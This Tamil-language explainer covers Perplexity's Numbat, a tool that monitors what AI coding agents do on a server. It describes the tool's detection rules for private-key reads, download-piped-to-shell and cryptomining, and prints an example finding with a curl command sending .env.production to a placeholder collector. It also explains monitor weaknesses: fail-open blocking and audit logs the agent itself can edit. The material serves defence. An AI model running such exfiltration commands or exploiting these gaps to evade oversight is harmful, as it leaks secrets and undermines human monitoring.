AI agents என்ன செய்கின்றன என்பதை கண்காணிக்க Numbat
Perplexity உருவாக்கிய Numbat கருவி மூலம் உங்கள் சர்வரில் AI coding agents செய்யும் செயல்களை எவ்வாறு கண்காணிக்கலாம் என்பதை அறியுங்கள். இது என்னென்ன தரவுகளைப் பதிவு செய்கிறது?
Numbat என்றால் என்ன
நீங்கள் வைத்திருக்கும் ஒரு கணினியில் AI agent என்ன செய்தது என்பதைத் தெரிந்துகொள்ள Numbat உதவுகிறது. கோடிங் ஏஜெண்டுகள் ஏற்கனவே உருவாக்கும் hook callbacks மற்றும் session கோப்புகளை இது வாசிக்கிறது. அவற்றை ஒரே சீரான நிகழ்வு வடிவத்திற்கு (event format) மாற்றி, SSH private key-ஐ வாசிப்பது அல்லது பதிவிறக்கத்தை நேரடியாக shell-க்கு அனுப்புவது போன்ற செயல்களைக் கண்டறியும் விதிகளுடன் ஒப்பிடுகிறது. Perplexity இதனை Apache 2.0 உரிமத்தின் கீழ் open source-ஆக வெளியிட்டுள்ளது. இதன் முதல் tagged release 29 July 2026 அன்று வெளியானது.
கீழே உள்ள தகவல்கள் அனைத்தும் 2 August 2026 அன்று வாசிக்கப்பட்ட, இந்தத் திட்டத்தின் repository மற்றும் அதன் சொந்த ஆவணங்களிலிருந்து பெறப்பட்டவை. Perplexity ஒரு கருத்தைச் சொல்லும்போது, அது அவர்களது கூற்று என்று இந்தத் தொகுப்பில் குறிப்பிடப்பட்டுள்ளது. இது ஒரு நிறுவல் கையேடு (install tutorial) அல்ல, ஏனெனில் இந்த repository சில நாட்களே ஆனவை என்பதால், அதன் கட்டளைகள் மாறக்கூடும்.
சிக்கல்: ஏஜென்ட் என்ன செய்தது என்பதை யாரும் பதிவு செய்வதில்லை
உங்கள் VPS-ல் இயங்கும் ஒரு coding agent, நீங்கள் வழங்கிய பயனர் கணக்கின் அனுமதியுடன் shell commands-ஐ இயக்குகிறது, கோப்புகளைப் படிக்கிறது, எழுதுகிறது மற்றும் network connections-ஐ உருவாக்குகிறது. ஏஜென்ட் உங்கள் shell-ல் தட்டச்சு செய்யாததால், உங்கள் shell history-ல் இவை எதுவும் பதிவாகாது. sshd உங்கள் login-ஐ மட்டுமே பதிவு செய்யும், அதன் பிறகு அந்த model என்ன செய்தது என்பதைப் பதிவு செய்யாது. sudo-ஐ ஏதேனும் அணுகினால் ஒழிய, /var/log/auth.log அமைதியாகவே இருக்கும். ஏஜென்ட் தனது சொந்த transcript-ஐ வைத்திருக்கும், ஆனால் அந்த கோப்பு ஏஜென்ட்டின் session directory-ல் இருக்கும். அதன் வடிவம் ஒவ்வொரு releases-க்கும் மாறக்கூடும், மேலும் ஏஜென்ட்டின் process-ஆலேயே அந்த கோப்பில் எழுத முடியும்.
எனவே, கடந்த செவ்வாய்க்கிழமை ஏஜென்ட் .env.production-ஐப் படித்ததா என்று யாராவது கேட்டால், பெரும்பாலான server-களில் "தெரியாது" என்பதே உண்மையான பதிலாக இருக்கும். இந்த இடைவெளியை நிரப்புவதற்காகவே இந்தத் திட்டம் உருவாக்கப்பட்டுள்ளது.
Numbat என்ன செய்கிறது என்பது குறித்த Perplexity-ன் விளக்கம்
README கோப்பு இந்த கருவியை "AI agent செயல்பாடுகளுக்கான endpoint visibility, local detection, விருப்பத்தேர்வாக pre-action blocking, மற்றும் forensic reconstruction" என்று விவரிக்கிறது. இங்கே endpoint என்பது agent இயங்கும் கணினியைக் குறிக்கிறது; வெளியிலிருந்து கண்காணிக்கும் network appliance அல்ல. இவை தனித்தனி திறன்கள், மேலும் இவை வெவ்வேறு முக்கியத்துவத்தைக் கொண்டவை.
Detection சாதனத்திலேயே இயங்குகிறது. விதிகள் CEL (common expression language)-ல் எழுதப்பட்டு உள்ளூர் அளவில் மதிப்பீடு செய்யப்படுகின்றன. இதில் பல-படிநிலை sequence விதிகள் மற்றும் YAML-ல் உங்கள் சொந்த விதிகளைச் சேர்க்கும் வசதியும் உள்ளது. ஒரு விதியைச் செயல்படுத்த எந்தத் தகவலும் கணினியை விட்டு வெளியேற வேண்டியதில்லை.
Blocking என்பது விருப்பத்தேர்வு மற்றும் குறிப்பிட்ட எல்லைக்கு உட்பட்டது. இது synchronous pre-action hooks மூலம் மட்டுமே செயல்படும், அதுவும் அத்தகைய வசதியை வழங்கும் agent-களில் மட்டுமே. நீங்கள் அதைச் செயல்படுத்தும் வரை அது முடக்கப்பட்டிருக்கும்.
Reconstruction என்பது நிகழ்வு நடந்த பிறகு நடக்கும். numbat scan ஒரு agent ஏற்கனவே வட்டில் (disk) எழுதிய session artifacts-ஐ பகுப்பாய்வு செய்கிறது. எனவே, நீங்கள் எதையும் நிறுவுவதற்கு முன்பே நடந்த செயல்பாடுகளைப் பார்க்க முடியும். இந்தத் திட்டத்தில் அந்த உரிமை கோரல் கவனமாக வரையறுக்கப்பட்டுள்ளது: "At-rest reconstruction என்பது disk அல்லது memory acquisition அல்ல, மேலும் ஒரு agent சேமிக்காத (persist செய்யாத) செயல்பாடுகளை இதைக் கொண்டு மீட்க முடியாது."
இதன் வெளியீடு versioned NDJSON (newline delimited JSON) வடிவில் உள்ளது. இது நிகழ்வுகள், கண்டுபிடிப்புகள், அமலாக்க முடிவுகள், குறிகாட்டிகள் மற்றும் scan சுருக்கங்களை உள்ளடக்கியது. v0.1.2 பதிப்பில் இது schema version 0.2.0-ல் உள்ளது. பதிவுகள் stdout அல்லது உள்ளூர் கோப்பிற்குச் செல்லும், விருப்பத்தேர்வாக நீங்கள் இயக்கும் collector-க்கு HTTP வழியாகவும் அனுப்பலாம். இது cgo இல்லாமல் உருவாக்கப்பட்ட ஒரே static Go binary-ஆக வழங்கப்படுகிறது. இது macOS, Linux மற்றும் Windows-ல் amd64 மற்றும் arm64 கட்டமைப்புகளுக்குக் கிடைக்கிறது. எனவே, ஒரு Linux VPS-ல் இதை நிறுவ எந்த runtime-ம் தேவையில்லை, இது ஒரே ஒரு கோப்பாக மட்டுமே இருக்கும்.
Numbat எந்தெந்த agents-ஐக் காண முடியும்?
docs/agent-coverage.md-ல் உள்ள coverage matrix-தான் இதற்கான அதிகாரப்பூர்வமான பட்டியல், இது சீரற்றதாக உள்ளது. திட்டக் குழுவினர் இதை மறைக்காமல் வெளிப்படையாகக் கூறுகின்றனர். Claude Code, Codex, Gemini CLI, Cursor மற்றும் GitHub Copilot CLI ஆகியவற்றுக்கு artifact scanning மற்றும் pre-action hook மூலம் live capture ஆகிய இரண்டு வசதிகளும் உள்ளன. OpenClaw, 2026.7.1 பதிப்பிலிருந்து ஒரு native plugin-ஐப் பெறுகிறது. நீண்ட வரிசையில் உள்ள பதிவுகள் deferred எனக் குறிக்கப்பட்டுள்ளன; அதாவது, live hook path இருந்தாலும், artifact parser இல்லை என்று பொருள். பெரும்பாலும், அந்த agent தனது வரலாற்றை SQLite-ல் சேமித்து வைப்பதாலும், அது இயங்கும்போது write-ahead log-ஐப் படிப்பது பாதுகாப்பற்றது என்பதாலும் இவ்வாறு நிகழ்கிறது. 2026 ஆகஸ்ட் 2 அன்று இந்த matrix-ஐப் பார்த்தபோது, OpenCode மற்றும் Cline ஆகியவை அந்தப் பிரிவிலேயே இருந்தன.
இந்தக் கருவியைப் பயன்படுத்தி எதையும் திட்டமிடுவதற்கு முன், உங்கள் agent-க்கான வரிசையைச் சரிபார்க்கவும். ஏனெனில், ஒவ்வொரு வரியிலும் "supported" (ஆதரிக்கப்படுகிறது) என்பது வெவ்வேறு அர்த்தங்களைக் குறிக்கிறது.
கண்டறிதல் எவ்வாறு அமையும்
விதிகள் (rules) அவற்றின் நோக்கத்தை விளக்கும் அடையாளங்களைக் (ids) கொண்டுள்ளன. secrets.read_private_key என்பது SSH key, AWS credentials, kube config அல்லது package registry login ஆகியவற்றைக் குறிக்கும். curl அல்லது wget-ன் வெளியீடு ஒரு interpreter-க்கு அனுப்பப்படும்போது exec.download_pipe_shell தூண்டப்படும். privilege.elevated_shell என்பது sudo, doas, su அல்லது pkexec வழியாக interactive root shell கோரப்படுவதைக் கண்டறியும். impact.cryptomining_launch என்பது அறியப்பட்ட miner binaries மற்றும் image பெயர்களுடன் பொருந்தும்.
Sequence விதிகள் ஒரே session-க்குள் நடக்கும் நிகழ்வுகளை இணைக்கின்றன. chain.secret_read_then_egress-க்கு ஒரு secret file வாசிக்கப்பட்டு, அதைத் தொடர்ந்து தரவை வெளியே அனுப்பும் ஒரு கட்டளை தேவைப்படுகிறது. README கோப்பானது, நேரடிச் சம்பவம் அல்லாமல், இரண்டு Claude Code pre-action callbacks-ஐக் கட்டுப்படுத்தப்பட்ட முறையில் மீண்டும் இயக்கியதன் மூலம் கிடைத்த முடிவை கீழே வெளியிடுகிறது. முக்கியமான புலங்கள் மட்டும் இங்கே சுருக்கமாகக் கொடுக்கப்பட்டுள்ளன:
{
"record_type": "finding",
"rule_id": "chain.secret_read_then_egress",
"rule_version": "1.4",
"severity": "high",
"confidence": "medium",
"title": "Secret-file access followed by data-bearing egress",
"observed_command": "curl --data-binary @/workspace/acme-api/.env.production https://collector.example.invalid/ingest",
"source_agent": "claude-code",
"source_type": "hook",
"tags": ["attack.t1048", "attack.t1552", "attack.t1567"]
}பதிவுக்குள் இருக்கும் "confidence": "medium"-ஐ கவனிக்கவும். இந்த வகை வெளியீடுகள் குறித்து அந்தத் திட்டம் என்ன கூறுகிறது என்பதையும் கவனிக்கவும்: "கண்டறியப்பட்டவை (findings) விதிகளின் பொருத்தங்களே தவிர, அவை ஊடுருவலுக்கான (compromise) ஆதாரங்கள் அல்ல." ஒரு key-ஐ வாசித்துவிட்டு, build artifact-ஐ பதிவேற்றும் ஒரு deploy script-ம் அதே sequence விதியுடன் பொருந்தும். அந்தப் பொருத்தம் சரியானது, ஆனால் எச்சரிக்கை தவறானது; நீங்கள் இதுவரை இயக்கிய ஒவ்வொரு கண்டறிதல் கருவியிலும் இதுவே இயல்பான நிலை.
Blocking இயல்பாகவே முடக்கப்பட்டுள்ளது, மேலும் இது fail-open முறையில் செயல்படுகிறது
Numbat வெளியிடும் ஒவ்வொரு விதியும் monitor மட்டுமே செய்யும். ஒரு விதியை block செய்யும் விதியாக மாற்றுவது ஒரு திட்டமிட்ட செயலாகும்: அந்த விதியின் முழுமையான YAML-ஐ உங்கள் சொந்த directory-க்கு நகலெடுக்கவும், அதே id-ஐத் தக்கவைக்கவும், enforce: true-ஐச் சேர்க்கவும், version-ஐ அதிகரிக்கவும், பின்னர் அந்த policy-ஐ validate செய்து install செய்யவும்.
numbat rules check --rules-dir ./numbat-policy
numbat hook install --agent codex --emit all \
--rules-dir ./numbat-policy --enforceஇப்போது, இதை நீங்கள் எந்த அளவுக்கு நம்பலாம் என்பதைத் தீர்மானிக்கும் பகுதி. Numbat-ன் deny என்பது agent-க்குத் திருப்பி அனுப்பப்படும் ஒரு பதில் ஆகும், மேலும் அந்த agent-தான் tool call-ஐ உண்மையில் மறுக்கும் காரணியாகும். Numbat-ல் ஏதேனும் சிக்கல் ஏற்படும்போது என்ன நடக்கும் என்பதை enforcement guide தெளிவாகக் கூறுகிறது: "Malformed payloads, evaluation errors, panics, மற்றும் output failures ஆகியவை numbat deny-ஐத் தடுத்துவிடும்." Hook input அதிகபட்சம் 4 MiB என வரையறுக்கப்பட்டுள்ளது, இந்த அளவைத் தாண்டும் input-களும் அதே பாதையையே பின்பற்றும்.
ஒரு deny செயல்முறைக்கு வரும்போது அதன் வரம்பைப் பற்றி guide தெளிவாகக் கூறுகிறது: "Fail-open என்பது numbat தனது deny பதிலை வழங்காது என்று அர்த்தம். இது tool இயங்கும் என்பதற்கு உத்தரவாதம் அளிக்காது: host இன்னும் prompt செய்யலாம், deny செய்யலாம், time out ஆகலாம், அல்லது மற்றொரு hook அல்லது policy-ஐப் பயன்படுத்தலாம்."
எனவே, இங்கு enforcement என்பது ஒரு பாதுகாப்பு அரண் (guardrail) மட்டுமே, எல்லை (boundary) அல்ல. process செயலிழந்தால், அந்தச் செயல் Numbat-ஆல் தடுக்கப்படாது, ஏனெனில் ஒவ்வொரு முறை சிக்கல் ஏற்படும்போதும் உங்கள் agent-ஐ முடக்கும் ஒரு monitor ஒரு வாரத்திற்குள் uninstall செய்யப்பட்டுவிடும். இந்த வர்த்தகம் நியாயமானது. எனவே, deny எப்போதும் வந்து சேரும் என்று கருதி ஒரு security model-ஐ உருவாக்க வேண்டாம்.
நீங்கள் ஏற்கனவே செய்யும் பணிகளுக்கு இடையே Numbat எவ்வாறு பொருந்துகிறது
Numbat உங்கள் endpoint-ல், agent-ன் சொந்த process tree-க்குள் இயங்குகிறது. இது இயல்பாக ~/.numbat/records.ndjson-ல் தரவுகளை எழுதுகிறது. உங்கள் பயனர் கணக்கில் இயங்கும் ஒரு agent-ஆல் அந்த கோப்பை வாசிக்க முடியும். அதை மாற்றவும் முடியும். ஒரு audit trail-ன் மதிப்பு, அதைச் சுற்றியுள்ள பாதுகாப்புத் தன்மையைப் பொறுத்தது. எனவே, நீங்கள் ஏற்கனவே வைத்துள்ள கட்டுப்பாடுகள் அனைத்தும் இந்த agent-க்கு முன்னால் இருக்க வேண்டும், பின்னால் அல்ல.
Coding agent-க்கு ஒரு disposable VM வழங்குவது ஒரு தவறான செயல்பாடு எட்டக்கூடிய எல்லையை வரையறுக்கிறது. VPS-ல் குறைந்தபட்ச அதிகாரம் கொண்ட பயனர் (least privilege user), agent தேவையற்ற கோப்புகளை அணுகுவதைத் தடுக்கிறது. Agent-ன் சூழலில் credentials-ஐ வைக்காமல் இருப்பது, ஒரு secrets.read_private_key பொருத்தம் (match) அரிதாக நிகழும் வகையில் செய்கிறது, இதனால் அது நிகழும்போது மட்டும் கவனித்தால் போதுமானது. மேலும், Claude Code-க்காக நீங்கள் VPS-ல் அமைத்த sandbox தான் கட்டுப்பாட்டை உறுதி செய்யும் முதன்மை காரணியாகும். ஒரு தவறான செயல்பாடு எதைத் தொடலாம் என்பதை இந்த containment கட்டுப்படுத்துகிறது. அதே சமயம், குறியீடு ஏன் அவ்வாறு வடிவமைக்கப்பட்டுள்ளது என்பதை ஆவணப்படுத்துவது, agent எதிர்பாராத விதமாகச் செயல்படுவதைக் குறைத்து, உங்களை log-ஐப் பார்க்க வேண்டிய அவசியத்திலிருந்து காக்கிறது.
Numbat வழங்கும் கூடுதல் அம்சம் என்னவென்றால், அது ஒரு பதிவை (record) உருவாக்குகிறது. எனவே, அந்தப் பதிவை agent அணுக முடியாத இடத்திற்கு அனுப்பவும். numbat ship மற்றும் HTTP sink ஆகியவை இதற்காகவே உள்ளன. ஒரு இரண்டாவது கணினியில் அந்த stream-ன் நகலை வைத்திருப்பது, ஒரு சாதாரண log கோப்பிற்கும், ஆதாரத்திற்கும் (evidence) உள்ள வித்தியாசமாகும். இந்த event model-ல் MCP (model context protocol) புலங்களும் உள்ளன. எனவே, நீங்கள் VPS-ல் ஹோஸ்ட் செய்யும் MCP server வழியாகச் செல்லும் tool calls, உள்ளூர் shell commands-டன் ஒரே stream-ல் சேமிக்கப்படும். இது முக்கியமானது, ஏனெனில் bash-ஐ மட்டும் கண்காணிக்கும் எதற்கும் அந்தப் பாதை தெரியாது. இதே போன்ற blind spot, agent-ன் search backend-ஆக இணைக்கப்பட்டுள்ள SearXNG instance-க்கும் பொருந்தும். அங்கு ஆபத்து என்பது, ஏதேனும் ஒரு rule-ஆல் கண்டறியக்கூடிய command-ஆக இல்லாமல், நம்பகத்தன்மையற்ற பக்க உரையாக (untrusted page text) model-ன் context-க்குள் நுழைகிறது.
முதலில் read-only முறையில் முயற்சி செய்யவும்
Pinned version-ஐ நிறுவவும். go install-க்கு Go 1.26.5 அல்லது அதற்குப் பிந்தைய பதிப்பு தேவை. நீங்கள் source-லிருந்து build செய்ய விரும்பவில்லை என்றால், releases பக்கத்தில் SHA-256 checksum-களுடன் கூடிய prebuilt binaries உள்ளன.
go install github.com/perplexityai/numbat/cmd/numbat@v0.1.2
numbat agents
numbat scannumbat agents, அந்த box-ல் நிறுவப்பட்டுள்ள agents-ஐக் கண்டறியும். numbat scan, ஏற்கனவே disk-ல் உள்ள session artifacts-ஐப் பகுப்பாய்வு செய்து பதிவுகளை அச்சிடும். இந்த commands "hooks-ஐ நிறுவவோ அல்லது agent configuration-ஐ மாற்றவோ செய்யாது" என்று README குறிப்பிடுகிறது. மேலும், numbat "artifacts-ல் உள்ள agents-ஐயோ அல்லது commands-ஐயோ ஒருபோதும் இயக்காது, மேலும் இது configured HTTP sinks-க்கு மட்டுமே outbound கோரிக்கைகளை அனுப்பும்" என்றும் கூறுகிறது. ஸ்கேனிங் என்பது ரகசியத் தகவல்களை மறைக்கும் (redaction) வசதியுடன் கூடிய read-only செயல்முறையாகும், மேலும் சாதாரண பதிவு வெளியீட்டில் முழுமையான raw transcript ஒருபோதும் இருக்காது.
Live capture என்பது அடுத்த கட்டமாகும், இது agent configuration-ஐ மாற்றும்:
numbat hook install --agent codex --emit all
numbat hook status --agent codex--emit all, நிகழ்வுகள் (events), கண்டுபிடிப்புகள் (findings), குறிகாட்டிகள் (indicators) மற்றும் பொருந்தக்கூடிய அமலாக்க முடிவுகளை (enforcement decisions) ~/.numbat/records.ndjson-க்கு எழுதும். திட்டத்திலிருந்து நேரடியாக இரண்டு எச்சரிக்கைகள் வழங்கப்படுகின்றன. Hooks இயங்குவதற்கு முன்பே agent-க்குள் அவை நம்பகமானதாக (trusted) இருக்க வேண்டும், மேலும் --enforce போன்ற flags-ஐ மாற்றிய பிறகு அந்த நம்பிக்கையை மீண்டும் சரிபார்க்க வேண்டும். மேலும், hook status "execution அல்லது delivery-ஐ அல்ல, configuration-ஐ மட்டுமே சரிபார்க்கிறது", எனவே ஒரு ஆரோக்கியமான status line என்பது பதிவுகள் எங்கும் சென்றடைகின்றன என்பதற்கு ஆதாரமல்ல.
இந்த repository ஏன் ஒரு dependency-ஆக இருக்கக்கூடாது
பொது வெளியீடுகள் 29 ஜூலை 2026 அன்று v0.1.1 மற்றும் 1 ஆகஸ்ட் 2026 அன்று v0.1.2 ஆகும். இந்த இடுகை 2 ஆகஸ்ட் 2026 அன்று எழுதப்பட்டபோது, இந்த repository 597 stars பெற்றிருந்தது. இவ்வளவு வேகமான எண்கள் Perplexity-ன் வாசகர்களைக் குறிக்கின்றனவே தவிர, குறியீட்டின் (code) தரத்தை அல்ல. ஒரு star என்பது, அந்தப் பக்கத்தை பிற்காலத்தில் பார்ப்பதற்காக யாரோ ஒருவர் சேமித்து வைத்துள்ளார்கள் என்று பொருள்.
இந்த version எண், இது எந்த நிலையில் உள்ளது என்பதை உண்மையாகக் காட்டுகிறது. v0.1.2-ன் குறிப்புகள் பெரும்பாலும் credential redaction திருத்தங்கள், மற்றும் case bundle மற்றும் telemetry normalisation பணிகளைப் பற்றியவை. பிற நிரல்களின் (programs) transcripts-ஐப் பாதுகாப்பாகப் படிக்கும் ஒரு கருவியில், redaction பிழைகள் ஆரம்பகாலக் குறைபாடுகளாக எதிர்பார்க்கப்படுபவைதான். இவை இன்னும் தொடரும், ஏனெனில் உள்ளீடுகள் (inputs) பத்துக்கும் மேற்பட்ட முகவர்களிடமிருந்து (agents) வருகின்றன, அவை ஒவ்வொன்றும் தங்கள் சொந்த கால அட்டவணையில் வடிவத்தை மாற்றிக்கொள்கின்றன.
இதிலிருந்து இரண்டு நடைமுறை விதிகள் பின்பற்றப்பட வேண்டும். நீங்கள் வைத்திருக்கும் எதிலும் @latest-ஐப் பயன்படுத்தாமல், tag-ஐ மட்டும் pin செய்யவும். மேலும், record schema மாறாமல் நிலையாகும் வரை, இதை நீங்கள் சார்ந்திருக்கும் ஒரு கட்டுப்பாட்டு அமைப்பாகக் கருதாமல், நீங்கள் மதிப்பீடு செய்யும் ஒரு கருவியாகக் கருதவும்.
FAQ
Numbat ஆபத்தான AI agent கட்டளைகளைத் தடுக்கிறதா?
நீங்கள் விருப்பத்தேர்வு செய்தால் மட்டுமே, அதுவும் சிறந்த முயற்சியின் அடிப்படையில் மட்டுமே இது செயல்படும். Numbat வெளியிடும் ஒவ்வொரு விதியும் கண்காணிப்புக்கு மட்டுமே (monitor only). தடுப்பதற்கு (block), அந்த விதியின் YAML-ஐ உங்கள் சொந்த directory-க்கு நகலெடுத்து, அதன் id-ஐ அப்படியே வைத்துக்கொண்டு, enforce: true-ஐச் சேர்த்து, version-ஐ உயர்த்தி, --enforce மூலம் hook-ஐ நிறுவ வேண்டும். அவ்வாறு செய்தாலும், அந்தத் தடுப்பு என்பது agent-க்குத் திருப்பி அனுப்பப்படும் ஒரு பதில் மட்டுமே; அந்த அழைப்பை மறுப்பது agent-ன் பொறுப்பாகும். இந்தத் திட்டம் fail-open நடத்தையைக் கொண்டுள்ளது: தவறான payloads, evaluation பிழைகள், panics மற்றும் output தோல்விகள் என அனைத்தும் தடுப்புச் செயல்பாட்டை முடக்கிவிடும். இதை ஒரு பாதுகாப்பு அரணாகப் பயன்படுத்துங்கள், உங்கள் ஒரே எல்லைக்கோடாகக் கருத வேண்டாம்.
Numbat எந்தெந்த AI agent-களை ஆதரிக்கிறது?
ஒவ்வொரு agent-க்கும் ஆதரவு மாறுபடும், இது repository-ல் உள்ள docs/agent-coverage.md-ல் பட்டியலிடப்பட்டுள்ளது. 2 ஆகஸ்ட் 2026 அன்று அந்தப் பக்கத்தைப் பார்த்தபோது, Claude Code, Codex, Gemini CLI, Cursor மற்றும் GitHub Copilot CLI ஆகியவற்றுக்கு artifact scanning மற்றும் live capture வசதிகள் இருந்தன. OpenClaw, 2026.7.1 version முதல் native plugin-ஐக் கொண்டுள்ளது. பல பிற agent-கள் live hook path-உடன் பட்டியலிடப்பட்டுள்ளன, ஆனால் இன்னும் artifact parser இல்லை. பொதுவாக, அவற்றின் session history ஒரு SQLite database-ல் இருப்பதால், agent இயங்கும்போது அதை வாசிப்பது பாதுகாப்பானது அல்ல. உங்கள் agent-க்கான வரிசையை வாசியுங்கள், ஏனெனில் "ஆதரிக்கப்படுகிறது" (supported) என்ற சொல் அங்கு பல்வேறு நிலைகளைக் குறிக்கிறது.
Agent-ஆல் Numbat-ன் பதிவுகளை மாற்ற முடியுமா?
ஆம், அது அதே user-ஆக இயங்கினால் முடியும். பதிவுகள் இயல்பாகவே agent இருக்கும் அதே machine-ல் ~/.numbat/records.ndjson-ல் சேமிக்கப்படுகின்றன, எனவே அந்தப் பாதையில் எழுதும் அனுமதி (write access) உள்ள எவராலும் அவற்றை மாற்றவோ அல்லது நீக்கவோ முடியும். numbat ship அல்லது HTTP sink மூலம், agent அணுக முடியாத ஒரு collector-க்கு stream-ஐ அனுப்புங்கள்; local file-ஐ ஒரு வசதிக்காக மட்டும் வைத்திருங்கள். இதனால்தான் இந்த tool தனிமைப்படுத்துதலுக்கு (isolation) மாற்றாக இல்லாமல், அதற்கு ஒரு துணையாகச் செயல்படுகிறது. குறைந்தபட்ச சலுகைகள் கொண்ட user-ன் கீழ், ஒரு disposable VM-ல் அடைக்கப்பட்ட agent-ஆல் தனது சொந்த audit trail-ஐக் கட்டுப்படுத்துவது கடினம்.
Numbat production server-க்குத் தயாரா?
நீங்கள் சார்ந்திருக்கும் ஒரு கட்டுப்பாட்டு கருவியாக இது இன்னும் தயாராகவில்லை. முதல் public release v0.1.1 ஆனது 29 ஜூலை 2026 அன்றும், v0.1.2 ஆனது 1 ஆகஸ்ட் 2026 அன்றும் வெளியானது; எனவே flags மற்றும் record schema ஆகிய இரண்டும் இன்னும் மாற்றத்திற்கு உட்பட்டவை. ஒரு server-ல் numbat agents மற்றும் numbat scan-ஐ இயக்குவது read-only மற்றும் குறைந்த ஆபத்துடையது; உங்கள் agent-கள் disk-ல் எதை விட்டுச் செல்கின்றன என்பதை இது உங்களுக்குத் தெரிவிக்கும். முக்கியமான server-களில் enforcement hooks-ஐ நிறுவுவது ஒரு மாறுபட்ட முடிவாகும்; அதற்கு pinned tag-ஐப் பயன்படுத்துவதும், hook சரியாகச் செயல்படாதபோது என்ன செய்ய வேண்டும் என்பதற்கான திட்டமும் அவசியம்.